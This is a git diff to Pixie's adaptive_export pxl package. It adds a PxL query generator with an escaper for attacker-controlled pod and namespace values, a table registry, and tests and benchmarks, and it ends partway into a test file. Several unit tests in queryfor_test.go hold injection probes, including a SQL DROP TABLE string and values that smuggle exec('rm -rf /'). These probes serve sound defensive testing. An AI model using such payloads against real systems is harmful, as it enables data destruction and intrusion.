b/src/vizier/services/adaptive_export/internal/pxl/compile_test.go new file mode 100644 index 00000000000..724e12e827c --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/compile_test.go @@ -0,0 +1,88 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "errors" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// TestCompilePassthrough_MatchesQueryFor is the behaviour-preservation +// proof: rendering a precompiled template for a window must produce the +// EXACT bytes QueryFor emits for an empty Target over that same window. +// If this holds, the compiled firehose path is a pure structural change — +// it cannot capture differently than the legacy path it replaces. +func TestCompilePassthrough_MatchesQueryFor(t *testing.T) { + window := 3 * time.Minute + // Fixed instant so UnixNano bounds are deterministic. + now := time.Unix(1778339984, 0).UTC() + sliceStart := now.Add(-window) + sliceEnd := now + + legacy, err := QueryFor("http_events", anomaly.Target{}, sliceStart, sliceEnd, now) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + tmpl, err := CompilePassthrough("http_events", window) + if err != nil { + t.Fatalf("CompilePassthrough: %v", err) + } + got := Render(tmpl, sliceStart, sliceEnd) + if got != legacy { + t.Fatalf("rendered template != QueryFor\n--- compiled ---\n%s\n--- legacy ---\n%s", got, legacy) + } +} + +// TestCompilePassthrough_Shape pins the essential tokens so an accidental +// edit to the template (dropped time bound, lost upid resolution) fails +// loudly even without the byte-equality oracle above. 
+func TestCompilePassthrough_Shape(t *testing.T) { + tmpl, err := CompilePassthrough("dns_events", 60*time.Second) + if err != nil { + t.Fatalf("CompilePassthrough: %v", err) + } + for _, want := range []string{ + "#px:set max_output_rows_per_table=1000000", // raise Pixie 10k cap + "px.DataFrame(table='dns_events', start_time='-90s')", // window 60s + 30s pad + "df.time_ >= px.int64_to_time(%d)", + "df.time_ < px.int64_to_time(%d)", + "px.upid_to_namespace(df.upid)", + "px.upid_to_pod_name(df.upid)", + "px.display(df, 'dns_events')", + } { + if !strings.Contains(tmpl, want) { + t.Errorf("template missing %q:\n%s", want, tmpl) + } + } + // Exactly two %d verbs (the two time bounds) — nothing else parameterized. + if n := strings.Count(tmpl, "%d"); n != 2 { + t.Errorf("template has %d %%d verbs, want 2:\n%s", n, tmpl) + } +} + +// TestCompilePassthrough_UnknownTable rejects non-builtin tables, matching +// QueryFor's contract. +func TestCompilePassthrough_UnknownTable(t *testing.T) { + _, err := CompilePassthrough("not_a_table", time.Second) + if !errors.Is(err, ErrUnknownTable) { + t.Fatalf("err=%v want ErrUnknownTable", err) + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/pxl.go b/src/vizier/services/adaptive_export/internal/pxl/pxl.go deleted file mode 100644 index e4e27a40b6b..00000000000 --- a/src/vizier/services/adaptive_export/internal/pxl/pxl.go +++ /dev/null @@ -1,80 +0,0 @@ -// Copyright 2018- The Pixie Authors. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
-// See the License for the specific language governing permissions and -// limitations under the License. -// -// SPDX-License-Identifier: Apache-2.0 - -package pxl - -import ( - "context" - "fmt" - - log "github.com/sirupsen/logrus" - "px.dev/pixie/src/api/go/pxapi" - "px.dev/pixie/src/api/go/pxapi/errdefs" - "px.dev/pixie/src/api/go/pxapi/types" -) - -// recordCounter counts the number of records received -type recordCounter struct { - count int -} - -func (r *recordCounter) HandleInit(ctx context.Context, metadata types.TableMetadata) error { - return nil -} - -func (r *recordCounter) HandleRecord(ctx context.Context, record *types.Record) error { - r.count++ - return nil -} - -func (r *recordCounter) HandleDone(ctx context.Context) error { - return nil -} - -type recordCounterMux struct { - counter *recordCounter -} - -func (m *recordCounterMux) AcceptTable(ctx context.Context, metadata types.TableMetadata) (pxapi.TableRecordHandler, error) { - return m.counter, nil -} - -// ExecuteScript executes a PxL script and returns the number of records returned -func ExecuteScript(ctx context.Context, client *pxapi.Client, clusterID string, pxl string) (int, error) { - vz, err := client.NewVizierClient(ctx, clusterID) - if err != nil { - return 0, fmt.Errorf("failed to create vizier client: %w", err) - } - - counter := &recordCounter{} - tm := &recordCounterMux{counter: counter} - - resultSet, err := vz.ExecuteScript(ctx, pxl, tm) - if err != nil { - return 0, fmt.Errorf("failed to execute script: %w", err) - } - defer resultSet.Close() - - if err := resultSet.Stream(); err != nil { - if errdefs.IsCompilationError(err) { - return 0, fmt.Errorf("PxL compilation error: %w", err) - } - return 0, fmt.Errorf("error streaming results: %w", err) - } - - log.Debugf("Script execution time: %v, bytes received: %v", resultSet.Stats().ExecutionTime, resultSet.Stats().TotalBytes) - return counter.count, nil -} diff --git 
a/src/vizier/services/adaptive_export/internal/pxl/queryfor.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go new file mode 100644 index 00000000000..168c54a4722 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go @@ -0,0 +1,114 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "errors" + "fmt" + "regexp" + "strconv" + "strings" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// ErrUnknownTable is returned by QueryFor for a table not in BuiltinTables. +var ErrUnknownTable = errors.New("pxl: unknown pixie table") + +// pxSetMaxRows raises Pixie's per-table result cap via the query-broker's +// own `#px:set` query flag (parsed from the script — see +// src/vizier/services/query_broker/controllers/query_flags.go, default +// max_output_rows_per_table = 10000). Without it the planner's +// add_limit_to_batch_result_sink_rule silently truncates any px.display to +// 10000 rows, so a wide firehose window (or a very busy pod) loses the +// excess at the read. 1e6 is far above any realistic AE window. See +// memory project-ae-passthrough-10k-cap. +const pxSetMaxRows = "#px:set max_output_rows_per_table=1000000\n" + +// QueryFor returns a PxL script that selects rows from `table` for the +// (namespace, pod) of `t`, time-bounded to [sliceStart, sliceEnd). 
The +// `now` argument lets us compute a relative `start_time=` for +// px.DataFrame (PxL rejects ISO-string absolute bounds; we use a +// generously-padded relative bound and post-filter precisely with +// px.int64_to_time on the time_ column). +func QueryFor(table string, t anomaly.Target, sliceStart, sliceEnd, now time.Time) (string, error) { + if !IsBuiltin(table) { + return "", fmt.Errorf("%w: %q", ErrUnknownTable, table) + } + // pad covers (now - sliceStart) plus a 30s safety margin. When + // sliceStart is in the future (caller bug), now.Sub is negative and + // we'd ask pixie for a positive-only relative start; clamp to 30s. + pad := now.Sub(sliceStart) + 30*time.Second + if pad < 30*time.Second { + pad = 30 * time.Second + } + relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s" + + var b strings.Builder + b.WriteString(pxSetMaxRows) + b.WriteString("import px\n") + b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n") + b.WriteString("df = df[df.time_ >= px.int64_to_time(" + strconv.FormatInt(sliceStart.UnixNano(), 10) + ")]\n") + b.WriteString("df = df[df.time_ < px.int64_to_time(" + strconv.FormatInt(sliceEnd.UnixNano(), 10) + ")]\n") + b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n") + // px.upid_to_pod_name returns "namespace/pod_name" (carnot: + // metadata_ops.h UPIDToPodNameUDF::Exec → absl::Substitute("$0/$1", ns, name)), + // not the bare pod name. Filtering against bare t.Pod would always + // miss; build the namespaced key when we have both fields. + b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n") + if t.Namespace != "" { + b.WriteString("df = df[df.namespace == '" + escapePxL(t.Namespace) + "']\n") + } + if t.Pod != "" { + if t.Namespace != "" { + // Both fields present — use exact equality on the namespaced key. 
+ b.WriteString("df = df[df.pod == '" + escapePxL(t.Namespace+"/"+t.Pod) + "']\n") + } else { + // Pod-only fallback: df.pod is "/", so a bare-pod + // equality always misses. Regex-anchor "/" via + // px.regex_match so the defensive path stays functional. + b.WriteString("df = df[px.regex_match('^[^/]+/" + escapePxL(regexp.QuoteMeta(t.Pod)) + "$', df.pod)]\n") + } + } + b.WriteString("px.display(df, '" + table + "')\n") + return b.String(), nil +} + +// pxlEscaper turns raw bytes that could break out of a PxL single-quoted +// string into their Python-style escape sequences. The backslash MUST be +// mapped FIRST so its own substitution doesn't get double-escaped when +// processed alongside the rest. +// +// Why each entry: PxL is Python; a single-quoted literal closes on a bare +// ' and a raw newline (0x0A) terminates the statement, letting an +// attacker-controlled Target.Pod/Target.Namespace value inject a new +// PxL statement after the close. ', \r, \n, \t, and NUL are the +// byte-level shapes that can break the string boundary; everything +// else is opaque to the PxL parser inside a string literal. +var pxlEscaper = strings.NewReplacer( + `\`, `\\`, + `'`, `\'`, + "\n", `\n`, + "\r", `\r`, + "\t", `\t`, + "\x00", `\0`, +) + +func escapePxL(s string) string { + return pxlEscaper.Replace(s) +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go new file mode 100644 index 00000000000..64de6290687 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_bench_test.go @@ -0,0 +1,69 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// pxl.QueryFor sits on the controller fan-out path: ONE QueryFor call +// per (anomaly_hash, table) tuple per pass. With 11 PushPixieTables and +// N active anomaly windows, the per-pass cost is 11×N QueryFor calls +// (plus 11×N broker queries that the QueryFor strings parameterise). +// +// At sustained 100 active anomalies → 1100 QueryFor/sec. Allocation +// behaviour of fmt.Sprintf-style string builders is what the bench +// quantifies — informs whether sync.Pool'd strings.Builder would pay +// off if QueryFor turns up in CPU profiles. + +func BenchmarkQueryFor_http_events(b *testing.B) { + t := anomaly.Target{ + PID: 12345, + Comm: "java", + Pod: "backend-vulnerable-779cd9d765-mxr8t", + Namespace: "log4j-poc", + } + now := time.Now() + start := now.Add(-30 * time.Second) + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _, _ = QueryFor("http_events", t, start, now, now) + } +} + +// BenchmarkQueryFor_AllTables varies the table across all 13 BuiltinTables +// to ensure we're not missing a slow-path on a specific table. 
+func BenchmarkQueryFor_AllTables(b *testing.B) { + t := anomaly.Target{ + PID: 12345, + Comm: "java", + Pod: "backend-vulnerable-779cd9d765-mxr8t", + Namespace: "log4j-poc", + } + now := time.Now() + start := now.Add(-30 * time.Second) + tables := Names(Builtins()) + b.ReportAllocs() + b.ResetTimer() + for i := 0; i < b.N; i++ { + _, _ = QueryFor(tables[i%len(tables)], t, start, now, now) + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go new file mode 100644 index 00000000000..562ea794cc0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go @@ -0,0 +1,342 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "errors" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// fixed reference time for deterministic relStart computation. +var ( + fixedNow = time.Date(2026, 5, 9, 15, 23, 44, 0, time.UTC) + fixedStart = fixedNow.Add(-5 * time.Minute) // ATTACK − 5 min + fixedEnd = fixedNow.Add(5 * time.Minute) // ATTACK + 5 min + target = anomaly.Target{ + PID: 12345, Comm: "redis-server", + Pod: "redis-6fbcfb97c-82qxv", Namespace: "redis", + } +) + +// TestQueryFor_UnknownTable — non-builtin tables wrap ErrUnknownTable. 
+func TestQueryFor_UnknownTable(t *testing.T) { + _, err := QueryFor("nope_table", target, fixedStart, fixedEnd, fixedNow) + if err == nil || !errors.Is(err, ErrUnknownTable) { + t.Fatalf("want ErrUnknownTable wrapper, got %v", err) + } + if !strings.Contains(err.Error(), `"nope_table"`) { + t.Fatalf("error must echo the bad table name; got %v", err) + } +} + +// TestQueryFor_NamespacedPodFilter — px.upid_to_pod_name returns +// "{namespace}/{pod}" (verified in carnot's metadata_ops.h:387). The +// generated PxL must filter against the namespaced key when both +// fields are non-empty. +func TestQueryFor_NamespacedPodFilter(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + wantPodFilter := `df = df[df.pod == 'redis/redis-6fbcfb97c-82qxv']` + if !strings.Contains(q, wantPodFilter) { + t.Fatalf("expected pod filter %q in:\n%s", wantPodFilter, q) + } + wantNS := `df = df[df.namespace == 'redis']` + if !strings.Contains(q, wantNS) { + t.Fatalf("expected namespace filter %q in:\n%s", wantNS, q) + } +} + +// TestQueryFor_NamespaceOnly — only namespace filter when Pod is empty. +func TestQueryFor_NamespaceOnly(t *testing.T) { + tNoPod := anomaly.Target{Namespace: "redis"} + q, err := QueryFor("redis_events", tNoPod, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'redis']`) { + t.Fatalf("expected namespace filter; got:\n%s", q) + } + if strings.Contains(q, "df = df[df.pod ==") { + t.Fatalf("did not expect pod filter when Pod is empty; got:\n%s", q) + } +} + +// TestQueryFor_PodOnly — when Namespace is empty but Pod is set, fall +// back to a regex match on `*/{pod}` since px.upid_to_pod_name always +// returns "{namespace}/{pod}" — a bare-pod equality filter would always +// miss. The defensive path stays usable instead of being silently broken.
+func TestQueryFor_PodOnly(t *testing.T) { + tNoNS := anomaly.Target{Pod: "redis-foo"} + q, err := QueryFor("redis_events", tNoNS, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + // Must NOT emit the bare-pod equality (CR: that's a known-miss filter). + if strings.Contains(q, `df = df[df.pod == 'redis-foo']`) { + t.Fatalf("regression: emitted bare-pod equality that always misses:\n%s", q) + } + // Must emit a working filter that matches "{any-namespace}/redis-foo". + want := `df = df[px.regex_match('^[^/]+/redis-foo$', df.pod)]` + if !strings.Contains(q, want) { + t.Fatalf("expected regex-anchored pod filter\nwant: %s\ngot:\n%s", want, q) + } + if strings.Contains(q, "df = df[df.namespace ==") { + t.Fatalf("did not expect namespace filter; got:\n%s", q) + } +} + +// TestQueryFor_NoTargetFilters — empty Target → no namespace OR pod +// filter (caller-driven coarse query). +func TestQueryFor_NoTargetFilters(t *testing.T) { + q, err := QueryFor("redis_events", anomaly.Target{}, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if strings.Contains(q, "df.namespace ==") || strings.Contains(q, "df.pod ==") { + t.Fatalf("expected no namespace/pod filter for empty Target; got:\n%s", q) + } +} + +// TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper — sliceStart +// is `>=`; sliceEnd is `<`. Encoded as nanos.
+func TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + wantLower := `df = df[df.time_ >= px.int64_to_time(1778339924000000000)]` // 15:18:44 UTC ns + wantUpper := `df = df[df.time_ < px.int64_to_time(1778340524000000000)]` // 15:28:44 UTC ns + if !strings.Contains(q, wantLower) { + t.Fatalf("expected lower bound %q in:\n%s", wantLower, q) + } + if !strings.Contains(q, wantUpper) { + t.Fatalf("expected upper bound %q in:\n%s", wantUpper, q) + } +} + +// TestQueryFor_RelativeStartTime — pad covers (now − sliceStart) plus +// 30 s. With ATTACK − 5min as sliceStart and now == ATTACK, pad is +// 5 min + 30 s = 330 s. +func TestQueryFor_RelativeStartTime(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, "start_time='-330s'") { + t.Fatalf("expected start_time='-330s' in:\n%s", q) + } +} + +// TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture — caller-bug case; +// pad clamps to 30 s rather than emitting a positive (forward) start. +func TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture(t *testing.T) { + futureStart := fixedNow.Add(1 * time.Minute) // sliceStart > now + q, err := QueryFor("redis_events", target, futureStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, "start_time='-30s'") { + t.Fatalf("expected start_time='-30s' clamp in:\n%s", q) + } +} + +// TestQueryFor_EscapesSingleQuoteInTarget — apostrophes in pod / +// namespace get backslash-escaped so they don't break out of the +// PxL string literal. 
+func TestQueryFor_EscapesSingleQuoteInTarget(t *testing.T) { + tWeird := anomaly.Target{Namespace: "ns'with'quotes", Pod: "p'od"} + q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'ns\'with\'quotes']`) { + t.Fatalf("expected escaped namespace; got:\n%s", q) + } + if !strings.Contains(q, `df = df[df.pod == 'ns\'with\'quotes/p\'od']`) { + t.Fatalf("expected escaped namespaced pod key; got:\n%s", q) + } +} + +// TestQueryFor_EscapesBackslashInTarget — backslashes too. Asserts +// both namespace and the namespaced pod-key forms are escaped, so a +// `Pod` containing `\` can't terminate the PxL string literal. +func TestQueryFor_EscapesBackslashInTarget(t *testing.T) { + tWeird := anomaly.Target{Namespace: `ns\back`, Pod: `p\od`} + q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'ns\\back']`) { + t.Fatalf("expected escaped namespace; got:\n%s", q) + } + if !strings.Contains(q, `df = df[df.pod == 'ns\\back/p\\od']`) { + t.Fatalf("expected escaped namespaced pod key; got:\n%s", q) + } +} + +// TestQueryFor_EveryBuiltinTableEmits — smoke-test all known tables +// produce a syntactically-shaped PxL output (compile-not-tested). 
+func TestQueryFor_EveryBuiltinTableEmits(t *testing.T) { + for _, table := range Names(builtinTables) { + q, err := QueryFor(table, target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("table %s: %v", table, err) + } + if !strings.HasPrefix(q, "#px:set max_output_rows_per_table=1000000\nimport px\n") { + t.Fatalf("table %s: expected #px:set cap header then import px; got:\n%s", table, q) + } + if !strings.Contains(q, "px.display(df, '"+table+"')") { + t.Fatalf("table %s: expected px.display call with table name; got:\n%s", table, q) + } + } +} + +// TestEscapePxL_TableDriven — direct coverage of the escaper. Every byte +// that could break out of a single-quoted PxL string literal must come +// back as a non-breaking escape sequence. +func TestEscapePxL_TableDriven(t *testing.T) { + cases := []struct{ in, want string }{ + {"", ""}, + {"plain", "plain"}, + {"o'malley", `o\'malley`}, + {`back\slash`, `back\\slash`}, + {`mix'and\back`, `mix\'and\\back`}, + {"'; DROP TABLE alerts; --", `\'; DROP TABLE alerts; --`}, + // Byte-level string-breaking attempts: a raw \n would terminate + // the PxL statement and inject a new one on the next line. The + // escaper turns these into Python-style escape sequences that + // PxL renders as inert backslash-letter pairs inside the string. + {"line1\nline2", `line1\nline2`}, + {"line1\r\nline2", `line1\r\nline2`}, + {"col1\tcol2", `col1\tcol2`}, + {"trailing\x00", `trailing\0`}, + // The full injection probe targeting Target.Pod/Target.Namespace: + // close the literal, inject a new statement, comment out the + // trailing fragment. The escaper neutralises the close + newline; + // the trailing # stays as a literal '#' inside the string.
+ {"redis-pod', exec('rm -rf /'), '\n#", `redis-pod\', exec(\'rm -rf /\'), \'\n#`}, + } + for _, c := range cases { + if got := escapePxL(c.in); got != c.want { + t.Errorf("escapePxL(%q) = %q, want %q", c.in, got, c.want) + } + } +} + +// TestQueryFor_RejectsInjectionInTargetFields drives QueryFor with +// adversarial Pod/Namespace values and asserts the resulting PxL has +// EXACTLY the line count of a clean call — proving an injected newline +// can't add a statement. A same-line quote breakout is not asserted here. +// +// PxL line breakdown for a fully-populated Target (cf. QueryFor): +// +// #px:set ... 1 +// import px 1 +// df = px.DataFrame(...) 1 +// df = df[df.time_ >= ...] 1 +// df = df[df.time_ < ...] 1 +// df.namespace = px.upid_to_namespace(...) 1 +// df.pod = px.upid_to_pod_name(...) 1 +// df = df[df.namespace == '...'] 1 +// df = df[df.pod == '...'] 1 +// px.display(df, '...') 1 +// (trailing newline → empty 11th split) 1 +// +// Total: 10 statements + trailing empty == strings.Split == 11 entries.
+func TestQueryFor_RejectsInjectionInTargetFields(t *testing.T) { + const wantLines = 11 + + cases := []struct { + name string + target anomaly.Target + }{ + { + name: "newline-in-pod", + target: anomaly.Target{Pod: "p\n', exec('rm -rf /'), '", Namespace: "ns"}, + }, + { + name: "newline-in-namespace", + target: anomaly.Target{Pod: "p", Namespace: "ns\n', exec('rm -rf /'), '"}, + }, + { + name: "single-quote-only", + target: anomaly.Target{Pod: "p'); display('owned", Namespace: "ns"}, + }, + { + name: "carriage-return", + target: anomaly.Target{Pod: "p\rexec('owned')", Namespace: "ns"}, + }, + { + name: "backslash-escape-of-escape", + target: anomaly.Target{Pod: `p\', exec('owned'), \'`, Namespace: "ns"}, + }, + { + name: "null-byte", + target: anomaly.Target{Pod: "p\x00bonus", Namespace: "ns"}, + }, + { + name: "tab-bytes", + target: anomaly.Target{Pod: "p\texec('owned')", Namespace: "ns"}, + }, + } + for _, c := range cases { + t.Run(c.name, func(t *testing.T) { + q, err := QueryFor("http_events", c.target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if got := strings.Count(q, "\n") + 1; got != wantLines { + t.Fatalf("got %d lines, want %d (injection succeeded?)\n%s", got, wantLines, q) + } + // The exact statement count: each line must start with + // either #px:, import, df, or px.display — anything else is + // a smuggled call. + for i, line := range strings.Split(q, "\n") { + if line == "" { + continue + } + if !strings.HasPrefix(line, "#px:") && + !strings.HasPrefix(line, "import ") && + !strings.HasPrefix(line, "df") && + !strings.HasPrefix(line, "px.display") { + t.Fatalf("line %d looks injected: %q\nfull script:\n%s", i, line, q) + } + } + }) + } +} + +// TestQueryFor_PodOnlyRegexEscapesQuoteMetaInjection — the bare-pod +// fallback uses regexp.QuoteMeta + escapePxL; verify a pod name carrying +// regex meta chars + a single quote cannot add a statement. NOTE(review): +// QuoteMeta rewrites `(`, so an `exec(` probe can never match — confirm.
+func TestQueryFor_PodOnlyRegexEscapesQuoteMetaInjection(t *testing.T) { + tgt := anomaly.Target{Pod: "p.*'; exec('owned')"} + q, err := QueryFor("http_events", tgt, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if strings.Contains(q, "exec(") || strings.Count(q, "\n") > 9 { + t.Fatalf("pod-only path injection succeeded:\n%s", q) + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables.go b/src/vizier/services/adaptive_export/internal/pxl/tables.go new file mode 100644 index 00000000000..c29284ad58a --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/tables.go @@ -0,0 +1,132 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package pxl carries the strongly-typed list of pixie observation +// tables the adaptive-write feature targets, plus a stub Registry +// extension point for the future-PR work that lets users plug in their +// own tables alongside their UI-defined retention scripts. +// +// Importantly: the operator does NOT execute PxL itself in the current +// design. Pixie's retention plugin runs the user-defined PxL scripts +// and populates ClickHouse. 
This package is only used to: +// - enumerate the pixie tables the operator is aware of +// - keep a stable, named, audit-friendly set (no dynamic discovery) +// - declare the future Registry extension surface +package pxl + +// TableSpec is the strongly-typed identity of one pixie socket_tracer +// table the operator knows about. Bare-string identifiers are +// deliberately avoided in callers — TableSpec carries the table name +// today and is the natural place to attach future fields (column +// projections, retention TTLs, semantic tags) without breaking the API. +type TableSpec struct { + // Name is the ClickHouse / Pixie table name. Dotted names + // (e.g. "http2_messages.beta") are stored verbatim; backtick + // quoting is the responsibility of SQL emitters. + Name string + + // Protocol is the wire protocol the table observes. Documentary; + // helps an operator audit "which tables are about HTTP". + Protocol string +} + +// builtinTables enumerates the 13 pixie socket_tracer tables the +// adaptive-write feature is shipped with. The order is stable and +// matches the project's published documentation. Do NOT loop over +// dynamic discovery to populate this — strong static definition is +// the requirement. Unexported so the slice cannot be mutated by +// external callers; use [Builtins] or [DefaultRegistry] for read +// access (both return defensive copies). +// +// conn_stats was previously out-of-scope (rev-1) but is re-added for +// the rev-2 schema — the rev-2 ClickHouse schema now carries it and the +// retention-script preset emits it alongside the protocol-events +// tables. Unlike the protocol tables it carries counters, not +// per-message rows; ClickHouse MERGEs snapshot rows over the order +// key (no aggregating engine — each retention-script pull is its own +// snapshot row). 
+var builtinTables = []TableSpec{ + {Name: "http_events", Protocol: "HTTP/1.x"}, + {Name: "http2_messages.beta", Protocol: "HTTP/2 + gRPC"}, + {Name: "dns_events", Protocol: "DNS"}, + {Name: "redis_events", Protocol: "Redis (RESP)"}, + {Name: "mysql_events", Protocol: "MySQL"}, + {Name: "pgsql_events", Protocol: "PostgreSQL"}, + {Name: "cql_events", Protocol: "Cassandra / CQL"}, + {Name: "mongodb_events", Protocol: "MongoDB"}, + {Name: "kafka_events.beta", Protocol: "Kafka"}, + {Name: "amqp_events", Protocol: "AMQP / RabbitMQ"}, + {Name: "mux_events", Protocol: "Mux (Twitter Finagle)"}, + {Name: "tls_events", Protocol: "TLS handshake"}, + {Name: "conn_stats", Protocol: "Connection-level statistics"}, +} + +// Registry is the extension surface for users to register their own +// tables alongside the built-ins. STUB — not wired into the controller +// or main.go in this PR. The intended future shape is: +// +// ctlCfg.Registry = pxl.Compose(pxl.DefaultRegistry(), userRegistry) +// +// where Compose merges built-ins with user additions, and the +// controller iterates Registry.Tables() instead of builtinTables. +// +// Today the controller and main.go consume the built-in list directly. +// The future PR will plumb a Registry through controller.Config and +// rewrite the consumers. +type Registry interface { + Tables() []TableSpec +} + +// DefaultRegistry returns a Registry over the built-in tables. +// Future-PR callers compose this with user-supplied registries. +func DefaultRegistry() Registry { return defaultRegistry{} } + +type defaultRegistry struct{} + +// Tables returns a defensive copy so callers cannot mutate the +// package-level table list at runtime. +func (defaultRegistry) Tables() []TableSpec { + return append([]TableSpec(nil), builtinTables...) +} + +// Builtins returns a defensive copy of the built-in table list. +// Prefer this over a (now removed) exported slice so the global +// registry cannot be aliased and mutated by callers.
+func Builtins() []TableSpec { + return append([]TableSpec(nil), builtinTables...) +} + +// Names projects a []TableSpec to a []string for legacy callers that +// take bare names. Useful at API boundaries that haven't been +// strong-typed yet (controller.Config.Tables is one). +func Names(specs []TableSpec) []string { + out := make([]string, len(specs)) + for i, s := range specs { + out[i] = s.Name + } + return out +} + +// IsBuiltin reports whether the given name is one of the built-in +// tables. Bare-string callers can use this as a defensive guard. +func IsBuiltin(name string) bool { + for _, t := range builtinTables { + if t.Name == name { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables_test.go b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go new file mode 100644 index 00000000000..273c0f625ee --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go @@ -0,0 +1,128 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR 